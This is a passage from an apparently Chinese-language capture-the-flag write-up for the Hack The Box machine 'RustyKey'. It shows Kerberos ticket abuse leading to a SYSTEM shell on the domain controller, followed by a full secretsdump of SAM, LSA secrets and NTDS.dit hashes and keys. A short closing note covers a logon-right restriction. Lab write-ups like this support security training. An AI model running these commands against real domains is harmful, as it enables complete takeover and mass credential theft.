[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nxc smb dc.rustykey.htb -u backupadmin -k --use-kcache
SMB dc.rustykey.htb 445 dc [*] x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.rustykey.htb 445 dc [+] rustykey.htb\backupadmin from ccache (Pwn3d!)
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# impacket-smbexec -k -no-pass 'rustykey.htb/backupadmin@dc.rustykey.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>type c:\users\administrator\desktop\root.txt
c23d2704***********************
也可以导出ntds.dit
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# impacket-secretsdump -k -no-pass 'rustykey.htb/backupadmin@dc.rustykey.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3aac437da6f5ae94b01a6e5347dd920:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
RUSTYKEY\DC$:plain_password_hex:0c7fbe96b20b5afd1da58a1d71a2dbd6ac75b42a93de3c18e4b7d448316ca40c74268fb0d2281f46aef4eba9cd553bbef21896b316407ae45ef212b185b299536547a7bd796da250124a6bb3064ae48ad3a3a74bc5f4d8fbfb77503eea0025b3194af0e290b16c0b52ca4fecbf9cfae6a60b24a4433c16b9b6786a9d212c7aaefefa417fe33cc7f4dcbe354af5ce95f407220bada9b4d841a3aa7c6231de9a9ca46a0621040dc384043e19800093303e1485021289d8719dd426d164e90ee3db3914e3d378cc9e80560f20dcb64b488aa468c1b71c2bac3addb4a4d55231d667ca4ba2ad36640985d9b18128f7755b25
RUSTYKEY\DC$:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
[*] DefaultPassword
RUSTYKEY\Administrator:Rustyrc4key#!
[*] DPAPI_SYSTEM
dpapi_machinekey:0x3c06efaf194382750e12c00cd141d275522d8397
dpapi_userkey:0xb833c05f4c4824a112f04f2761df11fefc578f5c
[*] NL$KM
0000 6A 34 14 2E FC 1A C2 54 64 E3 4C F1 A7 13 5F 34 j4.....Td.L..._4
0010 79 98 16 81 90 47 A1 F0 8B FC 47 78 8C 7B 76 B6 y....G....Gx.{v.
0020 C0 E4 94 9D 1E 15 A6 A9 70 2C 13 66 D7 23 A1 0B ........p,.f.#..
0030 F1 11 79 34 C1 8F 00 15 7B DF 6F C7 C3 B4 FC FE ..y4....{.o.....
NL$KM:6a34142efc1ac25464e34cf1a7135f34799816819047a1f08bfc47788c7b76b6c0e4949d1e15a6a9702c1366d723a10bf1117934c18f00157bdf6fc7c3b4fcfe
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7a351e12f70cc177a1d5bd11b28ac26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f4ad30fa8d8f2cfa198edd4301e5b0f3:::
rustykey.htb\rr.parker:1137:aad3b435b51404eeaad3b435b51404ee:d0c72d839ef72c7d7a2dae53f7948787:::
rustykey.htb\mm.turner:1138:aad3b435b51404eeaad3b435b51404ee:7a35add369462886f2b1f380ccec8bca:::
rustykey.htb\bb.morgan:1139:aad3b435b51404eeaad3b435b51404ee:44c72edbf1d64dc2ec4d6d8bc24160fc:::
rustykey.htb\gg.anderson:1140:aad3b435b51404eeaad3b435b51404ee:93290d859744f8d07db06d5c7d1d4e41:::
rustykey.htb\dd.ali:1143:aad3b435b51404eeaad3b435b51404ee:20e03a55dcf0947c174241c0074e972e:::
rustykey.htb\ee.reed:1145:aad3b435b51404eeaad3b435b51404ee:8432ec4c4f9b9ce96b73a6451a1d9dcc:::
rustykey.htb\nn.marcos:1146:aad3b435b51404eeaad3b435b51404ee:33aa36a7ec02db5f2ec5917ee544c3fa:::
rustykey.htb\backupadmin:3601:aad3b435b51404eeaad3b435b51404ee:34ed39bc39d86932b1576f23e66e3451:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
Support-Computer1$:1103:aad3b435b51404eeaad3b435b51404ee:5014a29553f70626eb1d1d3bff3b79e2:::
Support-Computer2$:1104:aad3b435b51404eeaad3b435b51404ee:613ce90991aaeb5187ea198c629bbf32:::
Support-Computer3$:1105:aad3b435b51404eeaad3b435b51404ee:43c00d56ff9545109c016bbfcbd32bee:::
Support-Computer4$:1106:aad3b435b51404eeaad3b435b51404ee:c52b0a68cb4e24e088164e2e5cf2b98a:::
Support-Computer5$:1107:aad3b435b51404eeaad3b435b51404ee:2f312c564ecde3769f981c5d5b32790a:::
Finance-Computer1$:1118:aad3b435b51404eeaad3b435b51404ee:d6a32714fa6c8b5e3ec89d4002adb495:::
Finance-Computer2$:1119:aad3b435b51404eeaad3b435b51404ee:49c0d9e13319c1cb199bc274ee14b04c:::
Finance-Computer3$:1120:aad3b435b51404eeaad3b435b51404ee:65f129254bea10ac4be71e453f6cabca:::
Finance-Computer4$:1121:aad3b435b51404eeaad3b435b51404ee:ace1db31d6aeb97059bf3efb410df72f:::
Finance-Computer5$:1122:aad3b435b51404eeaad3b435b51404ee:b53f4333805f80406b4513e60ef83457:::
IT-Computer1$:1123:aad3b435b51404eeaad3b435b51404ee:fe60afe8d9826130f0e06cd2958a8a61:::
IT-Computer2$:1124:aad3b435b51404eeaad3b435b51404ee:73d844e19c8df244c812d4be1ebcff80:::
IT-Computer3$:1125:aad3b435b51404eeaad3b435b51404ee:b52b582f02f8c0cd6320cd5eab36d9c6:::
IT-Computer4$:1126:aad3b435b51404eeaad3b435b51404ee:763f9ea340ccd5571c1ffabf88cac686:::
IT-Computer5$:1127:aad3b435b51404eeaad3b435b51404ee:1679431d1c52638688b4f1321da14045:::
[*] Kerberos keys grabbed
Administrator:des-cbc-md5:e007705d897310cd
krbtgt:aes256-cts-hmac-sha1-96:ee3271eb3f7047d423c8eeaf1bd84f4593f1f03ac999a3d7f3490921953d542a
krbtgt:aes128-cts-hmac-sha1-96:24465a36c2086d6d85df701553a428af
krbtgt:des-cbc-md5:d6d062fd1fd32a64
rustykey.htb\rr.parker:des-cbc-md5:8c5b3b54b9688aa1
rustykey.htb\mm.turner:aes256-cts-hmac-sha1-96:707ba49ed61c6575bfe9a3fd1541fc008e8803bfb0d7b5d21122cc464f39cbb9
rustykey.htb\mm.turner:aes128-cts-hmac-sha1-96:a252d2716a0b365649eaec02f84f12c8
rustykey.htb\mm.turner:des-cbc-md5:a46ea77c13854945
rustykey.htb\bb.morgan:des-cbc-md5:d6ef5e57a2abb93b
rustykey.htb\gg.anderson:des-cbc-md5:8923850da84f2c0d
rustykey.htb\dd.ali:des-cbc-md5:613da45e3bef34a7
rustykey.htb\ee.reed:des-cbc-md5:08e0862aec809ea8
rustykey.htb\nn.marcos:aes256-cts-hmac-sha1-96:53ee5251000622bf04e80b5a85a429107f8284d9fe1ff5560a20ec8626310ee8
rustykey.htb\nn.marcos:aes128-cts-hmac-sha1-96:cf00314169cb7fea67cfe8e0f7925a43
rustykey.htb\nn.marcos:des-cbc-md5:e358835b1c238661
rustykey.htb\backupadmin:des-cbc-md5:625e25fe70a77358
DC$:des-cbc-md5:915d9d52a762675d
Support-Computer1$:aes256-cts-hmac-sha1-96:89a52d7918588ddbdae5c4f053bbc180a41ed703a30c15c5d85d123457eba5fc
Support-Computer1$:aes128-cts-hmac-sha1-96:3a6188fdb03682184ff0d792a81dd203
Support-Computer1$:des-cbc-md5:c7cb8a76c76dfed9
Support-Computer2$:aes256-cts-hmac-sha1-96:50f8a3378f1d75df813db9d37099361a92e2f2fb8fcc0fc231fdd2856a005828
Support-Computer2$:aes128-cts-hmac-sha1-96:5c3fa5c32427fc819b10f9b9ea4be616
Support-Computer2$:des-cbc-md5:a2a202ec91e50b6d
Support-Computer3$:aes256-cts-hmac-sha1-96:e3b7b8876ac617dc7d2ba6cd2bea8de74db7acab2897525dfd284c43c8427954
Support-Computer3$:aes128-cts-hmac-sha1-96:1ea036e381f3279293489c19cfdeb6c1
Support-Computer3$:des-cbc-md5:c13edcfe4676f86d
Support-Computer4$:aes256-cts-hmac-sha1-96:1708c6a424ed59dedc60e980c8f2ab88f6e2bb1bfe92ec6971c8cf5a40e22c1e
Support-Computer4$:aes128-cts-hmac-sha1-96:9b6d33ef93c69721631b487dc00d3047
Support-Computer4$:des-cbc-md5:3b79647680e0d57a
Support-Computer5$:aes256-cts-hmac-sha1-96:464551486df4086accee00d3d37b60de581ee7adad2a6a31e3730fad3dfaed42
Support-Computer5$:aes128-cts-hmac-sha1-96:1ec0c93b7f9df69ff470e2e05ff4ba89
Support-Computer5$:des-cbc-md5:73abb53162d51fb3
Finance-Computer1$:aes256-cts-hmac-sha1-96:a57ce3a3e4ee34bc08c8538789fa6f99f5e8fb200a5f77741c5bf61b3d899918
Finance-Computer1$:aes128-cts-hmac-sha1-96:e62b7b772aba6668af65e9d1422e6aea
Finance-Computer1$:des-cbc-md5:d9914cf29e76f8df
Finance-Computer2$:aes256-cts-hmac-sha1-96:4d45b576dbd0eab6f4cc9dc75ff72bffe7fae7a2f9dc50b5418e71e8dc710703
Finance-Computer2$:aes128-cts-hmac-sha1-96:3fd0dd200120ca90b43af4ab4e344a78
Finance-Computer2$:des-cbc-md5:23ef512fb3a8d37c
Finance-Computer3$:aes256-cts-hmac-sha1-96:1b2280d711765eb64bdb5ab1f6b7a3134bc334a3661b3335f78dd590dee18b0d
Finance-Computer3$:aes128-cts-hmac-sha1-96:a25859c88f388ae7134b54ead8df7466
Finance-Computer3$:des-cbc-md5:2a688a43ab40ecba
Finance-Computer4$:aes256-cts-hmac-sha1-96:291adb0905f3e242748edd1c0ecaab34ca54675594b29356b90da62cf417496f
Finance-Computer4$:aes128-cts-hmac-sha1-96:81fed1f0eeada2f995ce05bbf7f8f951
Finance-Computer4$:des-cbc-md5:6b7532c83bc84c49
Finance-Computer5$:aes256-cts-hmac-sha1-96:6171c0240ae0ce313ecbd8ba946860c67903b12b77953e0ee38005744507e3de
Finance-Computer5$:aes128-cts-hmac-sha1-96:8e6aa26b24cdda2d7b5474b9a3dc94dc
Finance-Computer5$:des-cbc-md5:92a72f7f865bb6cd
IT-Computer1$:aes256-cts-hmac-sha1-96:61028ace6c840a6394517382823d6485583723f9c1f98097727ad3549d833b1e
IT-Computer1$:aes128-cts-hmac-sha1-96:7d1a98937cb221fee8fcf22f1a16b676
IT-Computer1$:des-cbc-md5:019d29370ece8002
IT-Computer2$:aes256-cts-hmac-sha1-96:e9472fb1cf77df86327e5775223cf3d152e97eebd569669a6b22280316cf86fa
IT-Computer2$:aes128-cts-hmac-sha1-96:a80fba15d78f66477f0591410a4ffda7
IT-Computer2$:des-cbc-md5:622f2ae961abe932
IT-Computer3$:aes256-cts-hmac-sha1-96:7871b89896813d9e4a732a35706fe44f26650c3da47e8db4f18b21cfbb7fbecb
IT-Computer3$:aes128-cts-hmac-sha1-96:0e14a9e6fd52ab14e36703c1a4c542e3
IT-Computer3$:des-cbc-md5:f7025180cd23e5f1
IT-Computer4$:aes256-cts-hmac-sha1-96:68f2e30ca6b60ec1ab75fab763087b8772485ee19a59996a27af41a498c57bbc
IT-Computer4$:aes128-cts-hmac-sha1-96:181ffb2653f2dc5974f2de924f0ac24a
IT-Computer4$:des-cbc-md5:bf58cb437340cd3d
IT-Computer5$:aes256-cts-hmac-sha1-96:417a87cdc95cb77997de6cdf07d8c9340626c7f1fbd6efabed86607e4cfd21b8
IT-Computer5$:aes128-cts-hmac-sha1-96:873fd89f24e79dcd0affe6f63c51ec9a
IT-Computer5$:des-cbc-md5:ad5eec6bcd4f86f7
3. BeyondRoot
3.1. SeDenyNetworkLogonRight
ee.read用户处于远程管理组但无法登录,原因在于其被SeDenyNetworkLogonRight 属性限制了
这个限制属于本地安全策略或组策略(GPO)
你可以通过下面的方式查看
secedit /export /cfg C:\ProgramData\secpol.cfg
cat C:\ProgramData\secpol.cfg | select-string "SeDenyNetworkLogonRight"